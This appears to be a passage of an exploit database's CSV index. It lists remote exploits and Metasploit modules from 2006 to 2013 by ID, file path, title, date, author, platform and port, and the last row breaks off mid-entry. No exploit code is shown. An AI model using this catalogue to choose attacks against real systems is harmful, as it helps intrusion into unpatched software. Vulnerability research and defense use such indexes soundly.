-28760,exploits/php/remote/28760.php,"PHP 3 < 5 - ZendEngine ECalloc Integer Overflow",2006-10-05,anonymous,php,remote, -28765,exploits/windows/remote/28765.c,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (1)",2006-10-05,LSsec.com,windows,remote, -28766,exploits/windows/remote/28766.py,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (2)",2006-10-05,LSsec.com,windows,remote, -28809,exploits/windows/remote/28809.rb,"HP LoadRunner - 'magentproc.exe' Remote Overflow (Metasploit)",2013-10-08,Metasploit,windows,remote,443 -28810,exploits/unix/remote/28810.rb,"GestioIP - Remote Command Execution (Metasploit)",2013-10-08,Metasploit,unix,remote, -28835,exploits/novell/remote/28835.pl,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (1)",2006-10-21,"Manuel Santamarina Suarez",novell,remote, -28836,exploits/novell/remote/28836.c,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (2)",2006-10-30,Expanders,novell,remote, -28837,exploits/novell/remote/28837.rb,"Novell eDirectory 8.x - iMonitor HTTPSTK Buffer Overflow (3)",2006-10-30,MC,novell,remote, -28847,exploits/hardware/remote/28847.txt,"D-Link DSL-G624T - Information Disclosure",2006-10-23,jose.palanco,hardware,remote, -28848,exploits/hardware/remote/28848.txt,"INCA IM-204 - Information Disclosure",2006-10-23,Crackers_Child,hardware,remote, -28849,exploits/windows/remote/28849.txt,"Cruiseworks 1.09 - 'Cws.exe' Doc Directory Traversal",2006-10-24,"Tan Chew Keong",windows,remote, -28850,exploits/windows/remote/28850.txt,"Cruiseworks 1.09 - 'Cws.exe' Doc Buffer Overflow",2006-10-24,"Tan Chew Keong",windows,remote, -28853,exploits/windows/remote/28853.html,"Indusoft Thin Client 7.1 - ActiveX Buffer Overflow",2013-10-10,blake,windows,remote, -28876,exploits/windows/remote/28876.html,"Microsoft Internet Explorer 6 - Code Execution (1)",2006-10-30,"Michal Bucko",windows,remote, -28877,exploits/windows/remote/28877.html,"Microsoft Internet Explorer 6 - Code Execution (2)",2006-10-30,"Michal Bucko",windows,remote, -28884,exploits/windows/remote/28884.html,"BlooMooWeb 1.0.9 - ActiveX Control Multiple Vulnerabilities",2006-10-31,maxgipeh,windows,remote, -28887,exploits/java/remote/28887.txt,"Sun Java System 6.x - Messenger Express Cross-Site Scripting",2006-10-31,Handrix,java,remote, -28888,exploits/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router - Information Disclosure",2006-10-31,LegendaryZion,hardware,remote, -28916,exploits/windows/remote/28916.rb,"America Online ICQ 5.1 - ActiveX Control Remote Code Execution",2006-11-06,"Peter Vreugdenhil",windows,remote, -28962,exploits/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console - Java Execution (Metasploit)",2013-10-14,Metasploit,multiple,remote, -28968,exploits/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent - ActiveX Control Overflow",2013-10-15,blake,windows,remote, -28973,exploits/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow (Metasploit)",2013-10-15,Metasploit,windows,remote, -28974,exploits/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) (Metasploit)",2013-10-15,Metasploit,windows,remote, -28981,exploits/multiple/remote/28981.txt,"IBM Websphere 6.0 - 'Faultactor' Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote, -28987,exploits/multiple/remote/28987.c,"Digipass Go3 - Insecure Encryption",2006-11-13,faypou,multiple,remote, -29032,exploits/windows/remote/29032.txt,"Conxint FTP 2.2.603 - Multiple Directory Traversal Vulnerabilities",2006-11-15,"Greg Linares",windows,remote, -29033,exploits/linux/remote/29033.html,"Links_ ELinks 'smbclient' - Remote Command Execution",2006-11-18,"Teemu Salmela",linux,remote, -29035,exploits/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow (Metasploit)",2013-10-18,Asesino04,windows,remote, -29045,exploits/windows/remote/29045.txt,"Selenium Web Server 1.0 - Cross-Site Scripting",2006-11-15,"Greg Linares",windows,remote, -29083,exploits/windows/remote/29083.txt,"Sage 1.3.x - IMG Element Input Validation",2006-09-08,"Kevin Kierznowski",windows,remote, -29096,exploits/windows/remote/29096.rb,"NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote, -29127,exploits/hardware/remote/29127.rb,"D-Link DIR-605L - Captcha Handling Buffer Overflow (Metasploit)",2013-10-22,Metasploit,hardware,remote,80 -29129,exploits/windows/remote/29129.rb,"Interactive Graphical SCADA System - Remote Command Injection (Metasploit)",2013-10-22,Metasploit,windows,remote,12397 -29130,exploits/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet - Directory Traversal (Metasploit)",2013-10-22,Metasploit,windows,remote,8080 -29132,exploits/unix/remote/29132.rb,"WebTester 5.x - Command Execution (Metasploit)",2013-10-22,Metasploit,unix,remote,80 -29160,exploits/linux/remote/29160.c,"GNU Tar 1.1x - 'GNUTYPE_NAMES' Directory Traversal",2006-11-21,"Teemu Salmela",linux,remote, -29146,exploits/windows/remote/29146.c,"Novell Client 4.91 - 'NWSPOOL.dll' Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",windows,remote, -29167,exploits/windows/remote/29167.rb,"NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote, -29171,exploits/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote, -29210,exploits/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload (Metasploit)",2013-10-26,Metasploit,php,remote,80 -29273,exploits/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,hardware,remote,8080 -29281,exploits/windows/remote/29281.txt,"Hilgraeve HyperAccess 8.4 - Multiple Remote Command Execution Vulnerabilities",2006-12-14,"Brett Moore",windows,remote, -29290,exploits/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution",2013-10-29,kingcope,php,remote,80 -29302,exploits/linux/remote/29302.txt,"Mono XSP 1.x/2.0 - Source Code Information Disclosure",2006-12-20,jose.palanco,linux,remote, -29316,exploits/php/remote/29316.py,"Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner",2013-10-31,noptrix,php,remote, -29319,exploits/php/remote/29319.rb,"vTiger CRM 5.3.0 5.4.0 - Authenticated Remote Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80 -29320,exploits/php/remote/29320.rb,"NAS4Free - Remote Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80 -29321,exploits/linux/remote/29321.rb,"Zabbix - Authenticated Remote Command Execution (Metasploit)",2013-10-31,Metasploit,linux,remote,80 -29322,exploits/php/remote/29322.rb,"ISPConfig - Authenticated Arbitrary PHP Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80 -29323,exploits/linux/remote/29323.rb,"OpenMediaVault Cron - Remote Command Execution (Metasploit)",2013-10-31,Metasploit,linux,remote,80 -29324,exploits/linux/remote/29324.rb,"Moodle - Remote Command Execution (Metasploit)",2013-10-31,Metasploit,linux,remote,80 -29325,exploits/php/remote/29325.rb,"ProcessMaker Open Source - Authenticated PHP Code Execution (Metasploit)",2013-10-31,Metasploit,php,remote,80 -30186,exploits/linux/remote/30186.txt,"Firebird SQL Fbserver 2.0 - Remote Buffer Overflow",2007-06-12,"Cody Pierce",linux,remote, -29371,exploits/multiple/remote/29371.txt,"Oracle 10g Portal - 'Key' Cross-Site Scripting",2006-12-29,"Pham Duc Hai",multiple,remote, -29383,exploits/linux/remote/29383.txt,"Adobe Reader 9.1.3 Plugin - Cross-Site Scripting",2007-01-03,"Stefano Di Paola",linux,remote, -29475,exploits/multiple/remote/29475.txt,"Oracle January 2007 Security Update - Multiple Vulnerabilities",2007-01-16,"Esteban Martinez Fayo",multiple,remote, -29400,exploits/novell/remote/29400.txt,"Novell Access Manager 3 Identity Server - 'IssueInstant' Cross-Site Scripting",2007-01-08,anonymous,novell,remote, -29439,exploits/multiple/remote/29439.txt,"iPlanet Web Server 4.1 - Search Module Cross-Site Scripting",2007-01-09,Khalsa,multiple,remote, -29448,exploits/osx/remote/29448.txt,"Apple Mac OSX 10.4.8 - DMG UFS Byte_Swap_Sbin() Integer Overflow",2007-01-12,LMH,osx,remote, -29449,exploits/multiple/remote/29449.html,"Oracle ORADC - ActiveX Control Remote Code Execution",2007-01-12,"Umesh Wanve",multiple,remote, -29513,exploits/linux/remote/29513.rb,"VICIdial Manager - Send OS Command Injection (Metasploit)",2013-11-08,Metasploit,linux,remote,80 -29471,exploits/linux/remote/29471.txt,"BlueZ 1.x/2.x - HIDD Bluetooh HID Command Injection",2007-11-16,"Collin Mulliner",linux,remote, -29490,exploits/windows/remote/29490.txt,"avm fritz!dsl igd control service 2.2.29 - Directory Traversal Information Disclosure",2007-01-17,DPR,windows,remote, -29496,exploits/linux/remote/29496.txt,"ArsDigita Community System 3.4.x - Directory Traversal",2007-01-18,"Elliot Kendall",linux,remote, -30037,exploits/windows/remote/30037.txt,"Caucho Resin 3.1 - Encoded Space Request Full Path Disclosure",2007-05-15,"Derek Abdine",windows,remote, -30038,exploits/windows/remote/30038.txt,"Caucho Resin 3.1 - '/web-inf' Traversal Arbitrary File Access",2007-05-15,"Derek Abdine",windows,remote, -30043,exploits/linux/remote/30043.txt,"Sun Java JDK 1.x - Multiple Vulnerabilities",2007-05-16,"Chris Evans",linux,remote, -30045,exploits/windows/remote/30045.html,"PrecisionID Barcode - 'PrecisionID_Barcode.dll' ActiveX 1.9 Control Arbitrary File Overwrite",2007-05-16,shinnai,windows,remote, -30049,exploits/windows/remote/30049.html,"LeadTools MultiMedia 15 - 'Ltmm15.dll' ActiveX Control Stack Buffer Overflow",2007-05-17,shinnai,windows,remote, -30052,exploits/multiple/remote/30052.txt,"Apache Tomcat 6.0.10 - Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"Ferruh Mavituna",multiple,remote, -30016,exploits/windows/remote/30016.txt,"Adobe RoboHelp - Frameset-7.HTML Cross-Site Scripting",2007-05-08,"Michael Domberg",windows,remote, -30018,exploits/linux/remote/30018.py,"Python 2.5 - 'PyLocale_strxfrm' Remote Information Leak",2007-05-08,"Piotr Engelking",linux,remote, -30019,exploits/windows/remote/30019.c,"CA (Multiple Products) - Console Server / 'InoCore.dll' Remote Code Execution",2007-05-09,binagres,windows,remote, -30025,exploits/multiple/remote/30025.txt,"TeamSpeak Server 2.0.23 (Multiple Scripts) - Multiple Cross-Site Scripting Vulnerabilities",2007-05-11,"Gilberto Ficara",multiple,remote, -30026,exploits/windows/remote/30026.txt,"TFTP Server TFTPDWin 0.4.2 - Directory Traversal",2007-05-11,"Digital Defense",windows,remote, -29524,exploits/windows/remote/29524.txt,"Microsoft Word 2000 - Malformed Function Code Execution",2007-01-25,Symantec,windows,remote, -29527,exploits/linux/remote/29527.pl,"Xine 0.99.4 - '.m3u' Remote Format String",2007-01-03,"Kevin Finisterre",linux,remote, -29538,exploits/windows/remote/29538.c,"SSC DiskAccess NFS Client - 'DAPCNFSD.dll' Remote Stack Buffer Overflow",2007-01-29,"Andres Tarasco Acuna",windows,remote, -29685,exploits/windows/remote/29685.txt,"Nullsoft SHOUTcast 1.9.7 - Logfile HTML Injection",2007-02-27,SaMuschie,windows,remote, -29686,exploits/windows/remote/29686.txt,"Adobe Acrobat/Adobe Reader 7.0.9 - Information Disclosure",2007-02-28,pdp,windows,remote, -29687,exploits/windows/remote/29687.py,"HyperBook Guestbook 1.3 - GBConfiguration.DAT Hashed Password Information Disclosure",2007-02-28,PeTrO,windows,remote, -29812,exploits/windows/remote/29812.rb,"DesktopCentral AgentLogUpload - Arbitrary File Upload (Metasploit)",2013-11-25,Metasploit,windows,remote,8020 -29552,exploits/windows/remote/29552.rb,"Symantec Altiris DS - SQL Injection (Metasploit)",2013-11-13,Metasploit,windows,remote,402 -29573,exploits/multiple/remote/29573.xml,"Sage 1.3.6 - Extension Feed HTML Injection",2007-02-09,Fukumori,multiple,remote, -29575,exploits/windows/remote/29575.txt,"Plain Old WebServer 0.0.7/0.0.8 Firefox Extension - Directory Traversal",2006-09-25,"Stefano Di Paola",windows,remote, -29595,exploits/linux/remote/29595.txt,"PHP RRD Browser 0.2 - 'P' Directory Traversal",2007-02-12,"Sebastian Wolfgarten",linux,remote, -29614,exploits/osx/remote/29614.xml,"Parallels - Drag and Drop Hidden Share",2007-02-16,"Rich Mogull",osx,remote, -29619,exploits/windows/remote/29619.html,"Microsoft Internet Explorer 6 - Local File Access",2007-02-20,"Rajesh Sethumadhavan",windows,remote, -29666,exploits/hardware/remote/29666.rb,"Supermicro Onboard IPMI - 'close_window.cgi' Remote Buffer Overflow (Metasploit)",2013-11-18,Metasploit,hardware,remote,80 -29688,exploits/windows/remote/29688.txt,"EmbeddedWB Web Browser ActiveX Control - Remote Code Execution",2007-02-28,shinnai,windows,remote, -29689,exploits/linux/remote/29689.py,"GnuPG 1.x - Signed Message Arbitrary Content Injection",2007-03-05,"Gerardo Richarte",linux,remote, -29690,exploits/linux/remote/29690.py,"KMail 1.x - GnuPG Arbitrary Content Injection",2007-03-05,"Gerardo Richarte",linux,remote, -29691,exploits/linux/remote/29691.py,"Gnome Evolution 2.x - GnuPG Arbitrary Content Injection",2007-03-05,"Gerardo Richarte",linux,remote, -29699,exploits/novell/remote/29699.txt,"Novell Access Management SSLVPN Server - Security Bypass",2007-03-02,anonymous,novell,remote, -29706,exploits/linux/remote/29706.txt,"DeepOfix SMTP Server 3.3 - Authentication Bypass",2013-11-19,"Gerardo Vazquez_ Eduardo Arriols",linux,remote, -29725,exploits/openbsd/remote/29725.py,"OpenBSD 3.x/4.x - ICMPv6 Packet Handling Remote Buffer Overflow",2007-03-09,"Alfredo Ortega",openbsd,remote, -29732,exploits/php/remote/29732.php,"PHP 5.2 - EXT/Filter Function Remote Buffer Overflow",2007-03-12,"Stefan Esser",php,remote, -29734,exploits/linux/remote/29734.txt,"PineApp MailSecure - Remote Command Execution",2013-11-20,"Ruben Garrote García",linux,remote,7443 -29735,exploits/hardware/remote/29735.rb,"D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow",2007-03-12,LSO,hardware,remote, -29739,exploits/linux/remote/29739.txt,"Apache Tomcat 5.x/6.0.x - Directory Traversal",2007-03-14,"D. Matscheko",linux,remote, -29741,exploits/windows/remote/29741.txt,"Microsoft Internet Explorer 7 - NavCancel.HTM Cross-Site Scripting",2007-03-14,"Aviv Raff",windows,remote, -29749,exploits/multiple/remote/29749.txt,"Oracle Portal 10g - 'P_OldURL' Cross-Site Scripting",2007-03-16,d3nx,multiple,remote, -29752,exploits/php/remote/29752.php,"PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation",2007-03-19,"Stefan Esser",php,remote, -29753,exploits/linux/remote/29753.c,"File(1) 4.13 - Command File_PrintF Integer Underflow",2007-03-19,"Jean-Sebastien Guay-Leroux",linux,remote, -29768,exploits/linux/remote/29768.txt,"Mozilla FireFox 1.5.x/2.0 - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote, -29769,exploits/linux/remote/29769.txt,"Opera 9.x - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote, -29770,exploits/linux/remote/29770.txt,"KDE Konqueror 3.x/IOSlave - FTP PASV Port-Scanning",2007-03-21,mark,linux,remote, -29771,exploits/windows/remote/29771.txt,"Microsoft Windows Vista - Windows Mail Local File Execution",2007-03-23,kingcope,windows,remote, -29784,exploits/php/remote/29784.php,"PHP 5.2.1 - Folded Mail Headers Email Header Injection",2007-11-26,"Stefan Esser",php,remote, -29785,exploits/php/remote/29785.txt,"aBitWhizzy - 'whizzypic.php?d' Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,remote, -29788,exploits/php/remote/29788.php,"PHP 4.4.4 - 'Zip_Entry_Read()' Integer Overflow",2007-03-27,"Stefan Esser",php,remote, -30117,exploits/php/remote/30117.php,"PHP 5.1.6 - 'Chunk_Split()' Integer Overflow",2007-05-31,"Gerhard Wagner",php,remote, -30130,exploits/php/remote/30130.txt,"PHP 5.2.3 - EXT/Session HTTP Response Header Injection",2007-06-04,"Stefan Esser",php,remote, -30142,exploits/linux/remote/30142.txt,"GDB 6.6 - Process_Coff_Symbol UPX File Buffer Overflow",2007-06-04,"KaiJern Lau",linux,remote, -30144,exploits/windows/remote/30144.html,"eSellerate SDK 3.6.5 - 'eSellerateControl365.dll' ActiveX Control Buffer Overflow",2007-06-04,shinnai,windows,remote, -30164,exploits/hardware/remote/30164.txt,"3Com OfficeConnect Secure Router 1.04-168 - 'Tk' Cross-Site Scripting",2007-06-08,"Secunia Research",hardware,remote, -30169,exploits/windows/remote/30169.txt,"WindowsPT 1.2 - User ID Key Spoofing",2007-06-11,nnposter,windows,remote, -30176,exploits/windows/remote/30176.html,"Apple Safari 3 for Windows - Protocol Handler Command Injection",2007-06-12,"Thor Larholm",windows,remote, -30394,exploits/windows/remote/30394.rb,"Adobe Reader ToolButton - Use-After-Free (Metasploit)",2013-12-17,Metasploit,windows,remote, -29807,exploits/php/remote/29807.php,"PHP 5.1.6 - 'Imap_Mail_Compose()' Remote Buffer Overflow",2007-03-31,"Stefan Esser",php,remote, -29808,exploits/php/remote/29808.php,"PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",php,remote, -29814,exploits/windows/remote/29814.txt,"NextPage LivePublish 2.02 - 'LPEXT.dll' Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote, -29815,exploits/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,hardware,remote,443 -29820,exploits/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",multiple,remote, -29952,exploits/windows/remote/29952.html,"Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,windows,remote, -29840,exploits/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote, -29843,exploits/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console - Directory Traversal",2007-04-11,"Patrick Webster",windows,remote, -29853,exploits/windows/remote/29853.rb,"LANDesk Management Suite 8.7 Alert Service - 'AOLSRVR.exe' Remote Buffer Overflow",2007-04-13,"Aaron Portnoy",windows,remote, -29857,exploits/windows/remote/29857.rb,"Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090) (Metasploit)",2013-11-27,Metasploit,windows,remote, -29858,exploits/windows/remote/29858.rb,"Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022) (Metasploit)",2013-11-27,Metasploit,windows,remote, -29859,exploits/java/remote/29859.rb,"Apache Roller - OGNL Injection (Metasploit)",2013-11-27,Metasploit,java,remote,8080 -29873,exploits/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote, -29884,exploits/multiple/remote/29884.txt,"Apple QuickTime 7.1.5 - QTJava toQTPointer() Java Handling Arbitrary Code Execution",2007-04-23,"Shane Macaulay",multiple,remote, -29897,exploits/windows/remote/29897.txt,"Progress 3.1 - Webspeed _CPYFile.P Unauthorized Access",2007-04-24,suresync,windows,remote, -29930,exploits/multiple/remote/29930.txt,"Apache AXIS 1.0 - Non-Existent WSDL Path Information Disclosure",2007-04-27,jericho+bblog@attrition.org,multiple,remote, -29931,exploits/multiple/remote/29931.txt,"ManageEngine Password Manager Pro Build 5401 - Database Remote Unauthorized Access",2007-04-27,anonymous,multiple,remote, -29932,exploits/linux/remote/29932.txt,"RedHat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote, -29945,exploits/hardware/remote/29945.txt,"D-Link DSL-G624T - Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",hardware,remote, -29951,exploits/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,windows,remote, -29964,exploits/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow",2007-05-07,MC,windows,remote, -30373,exploits/windows/remote/30373.py,"Ability Mail Server 2013 3.1.1 - Web UI Persistent Cross-Site Scripting",2013-12-17,"David Um",windows,remote, -30008,exploits/java/remote/30008.rb,"Cisco Prime Data Center Network Manager - Arbitrary File Upload (Metasploit)",2013-12-03,Metasploit,java,remote, -30009,exploits/windows/remote/30009.rb,"ABB MicroSCADA - 'wserver.exe' Remote Code Execution (Metasploit)",2013-12-03,Metasploit,windows,remote,12221 -30010,exploits/php/remote/30010.rb,"Kimai 0.9.2 - 'db_restore.php' SQL Injection (Metasploit)",2013-12-03,Metasploit,php,remote,80 -30011,exploits/windows/remote/30011.rb,"Microsoft - Tagged Image File Format '.TIFF' Integer Overflow (Metasploit)",2013-12-03,Metasploit,windows,remote, -30067,exploits/windows/remote/30067.txt,"rdiffweb 0.3.5 - Directory Traversal",2007-05-22,"Jesus Roncero",windows,remote, -30069,exploits/windows/remote/30069.html,"Dart ZipLite Compression 1.8.5.3 - 'DartZipLite.dll' ActiveX Control Buffer Overflow",2007-05-22,shinnai,windows,remote, -30074,exploits/linux/remote/30074.txt,"PHP PEAR 1.5.3 - INSTALL-AS Attribute Arbitrary File Overwrite",2007-05-07,"Gregory Beaver",linux,remote, -30078,exploits/multiple/remote/30078.js,"Apple Safari 2.0.4 - Cross-Domain Browser Location Information Disclosure",2007-05-23,"Gareth Heyes",multiple,remote, -30089,exploits/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection",2007-05-25,BCC,linux,remote, -30209,exploits/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal (Metasploit)",2013-12-11,Metasploit,windows,remote,8080 -30210,exploits/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit)",2013-12-11,Metasploit,multiple,remote,80 -30211,exploits/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution",2013-12-11,rgod,windows,remote, -30212,exploits/php/remote/30212.rb,"vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)",2013-12-11,Metasploit,php,remote,80 -30218,exploits/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 - Parse Error Information Disclosure",2007-06-20,Prili,multiple,remote, -30219,exploits/multiple/remote/30219.txt,"MyServer 0.8.9 - Filename Parse Error Information Disclosure",2007-06-21,"Shay Priel",multiple,remote, -30222,exploits/multiple/remote/30222.txt,"MyServer 0.9.8 - Post.MSCGI Cross-Site Scripting",2007-01-02,Prili,multiple,remote, -30228,exploits/osx/remote/30228.txt,"Apple WebCore - XMLHTTPRequest Cross-Site Scripting",2007-06-22,"Richard Moore",osx,remote, -30229,exploits/multiple/remote/30229.txt,"SHTTPD 1.38 - Filename Parse Error Information Disclosure",2007-06-25,"Shay Priel",multiple,remote, -30231,exploits/multiple/remote/30231.txt,"Key Focus Web Server 3.1 - Index.WKF Cross-Site Scripting",2007-06-25,"Shay Priel",multiple,remote, -30284,exploits/linux/remote/30284.vbs,"Sun Java Runtime Environment 1.6 - Web Start '.JNLP' File Stack Buffer Overflow",2007-07-09,"Daniel Soeder",linux,remote, -30254,exploits/hardware/remote/30254.txt,"Linksys WAG54GS 1.0.6 (Wireless-G ADSL Gateway) - 'setup.cgi' Cross-Site Scripting",2007-06-27,"Petko Petkov",hardware,remote, -30256,exploits/multiple/remote/30256.txt,"Oracle Rapid Install Web Server - Secondary Login Page Cross-Site Scripting",2007-06-28,"Kaushal Desai",multiple,remote, -30257,exploits/windows/remote/30257.html,"HP Instant Support - ActiveX Control Driver Check Buffer Overflow",2007-04-01,"John Heasman",windows,remote, -30264,exploits/multiple/remote/30264.txt,"Fujitsu ServerView 4.50.8 - DBASCIIAccess Remote Command Execution",2007-07-03,"RedTeam Pentesting GmbH",multiple,remote, -30265,exploits/multiple/remote/30265.txt,"SAP Message Server - 'Group' Remote Buffer Overflow",2007-07-05,"Mark Litchfield",multiple,remote, -30278,exploits/windows/remote/30278.c,"SAP DB 7.x Web Server - 'WAHTTP.exe' Multiple Buffer Overflow Vulnerabilities",2007-07-05,"Mark Litchfield",windows,remote, -30279,exploits/multiple/remote/30279.txt,"SAP Internet Graphics Server 7.0 - 'ADM:GETLOGFILE?PARAMS' Cross-Site Scripting",2007-07-05,"Mark Litchfield",multiple,remote, -30281,exploits/windows/remote/30281.txt,"Microsoft .Net Framework 2.0 - Multiple Null Byte Injection Vulnerabilities",2007-07-06,"Paul Craig",windows,remote, -30285,exploits/linux/remote/30285.txt,"Microsoft Internet Explorer and Mozilla Firefox - URI Handler Command Injection",2007-07-10,"Thor Larholm",linux,remote, -30287,exploits/windows/remote/30287.txt,"TippingPoint IPS - Unicode Character Detection Bypass",2007-07-10,Security-Assessment.com,windows,remote, -30288,exploits/multiple/remote/30288.txt,"Adobe Flash Player 8.0.24 - '.SWF' File Handling Remote Code Execution",2007-07-10,"Stefano DiPaola",multiple,remote, -30291,exploits/linux/remote/30291.txt,"ClamAV / UnRAR - .RAR Handling Remote Null Pointer Dereference",2007-07-11,"Metaeye Security Group",linux,remote, -30292,exploits/multiple/remote/30292.pl,"Apple QuickTime 7.1.5 - Information Disclosure / Multiple Code Execution Vulnerabilities",2007-07-11,Wolf,multiple,remote, -30315,exploits/windows/remote/30315.txt,"Trillian 3.1.6.0 - URI Handler Remote Code Execution",2007-07-16,"Nate Mcfeters",windows,remote, -30319,exploits/linux/remote/30319.c,"tcpdump - Print-bgp.C Remote Integer Underflow",2007-03-01,mu-b,linux,remote, -30322,exploits/windows/remote/30322.rb,"Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote, -30381,exploits/windows/remote/30381.txt,"Multiple Browsers - URI Handlers Command Injection",2007-07-25,"Billy Rios",windows,remote, -30469,exploits/linux/remote/30469.rb,"RedHat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)",2013-12-24,Metasploit,linux,remote,443 -31465,exploits/windows/remote/31465.cs,"DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption",2008-03-21,"Brian Holyfield",windows,remote, -30431,exploits/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 - 'BaiduBar.dll' ActiveX Control Remote Code Execution",2007-07-29,cocoruder,windows,remote, -30432,exploits/novell/remote/30432.txt,"Novell Groupwise 6.5 Webaccess - 'User.Id' Cross-Site Scripting",2007-07-30,0x000000,novell,remote, -30439,exploits/linux/remote/30439.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Chrome-Loaded About:Blank Script Execution",2007-07-31,moz_bug_r_a4,linux,remote, -30441,exploits/windows/remote/30441.html,"BlueSkyChat ActiveX Control 8.1.2 - Remote Buffer Overflow",2007-07-31,"Code Audit Labs",windows,remote, -30447,exploits/windows/remote/30447.html,"Tor 0.1.2.15 - ControlPort Missing Authentication Unauthorized Access",2007-08-02,anonymous,windows,remote, -30454,exploits/linux/remote/30454.txt,"BlueCat Networks Adonis 5.0.2.8 - TFTP Privilege Escalation",2007-08-06,defaultroute,linux,remote, -30809,exploits/windows/remote/30809.txt,"SafeNet Sentinel Protection Server 7.x/Keys Server 1.0.3 - Directory Traversal",2007-11-26,"Corey Lebleu",windows,remote, -30470,exploits/unix/remote/30470.rb,"Synology DiskStation Manager - SLICEUPLOAD Remote Command Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,5000 -30471,exploits/linux/remote/30471.rb,"OpenSIS 'modname' - PHP Code Execution (Metasploit)",2013-12-24,Metasploit,linux,remote,80 -30473,exploits/unix/remote/30473.rb,"HP SiteScope issueSiebelCmd - Remote Code Execution (Metasploit)",2013-12-24,Metasploit,unix,remote,8080 -30485,exploits/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting",2007-08-10,"Henri Lindberg",hardware,remote, -30490,exploits/windows/remote/30490.txt,"Microsoft Internet Explorer 5.0.1 - 'TBLinf32.dll' ActiveX Control Remote Code Execution",2007-05-08,"Brett Moore",windows,remote, -30491,exploits/multiple/remote/30491.java,"OWASP Stinger - Filter Bypass",2007-08-13,"Meder Kydyraliev",multiple,remote, -30493,exploits/windows/remote/30493.js,"Microsoft XML Core Services 6.0 - SubstringData Integer Overflow",2007-08-14,anonymous,windows,remote, -30495,exploits/multiple/remote/30495.html,"Apache Tomcat 6.0.13 - Host Manager Servlet Cross-Site Scripting",2007-08-14,"NTT OSS CENTER",multiple,remote, -30496,exploits/multiple/remote/30496.txt,"Apache Tomcat 6.0.13 - Insecure Cookie Handling Quote Delimiter Session ID Disclosure",2007-08-14,"Tomasz Kuczynski",multiple,remote, -30499,exploits/multiple/remote/30499.txt,"RndLabs Babo Violent 2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,remote, -30502,exploits/java/remote/30502.txt,"Sun Java Runtime Environment 1.4.2 - Font Parsing Privilege 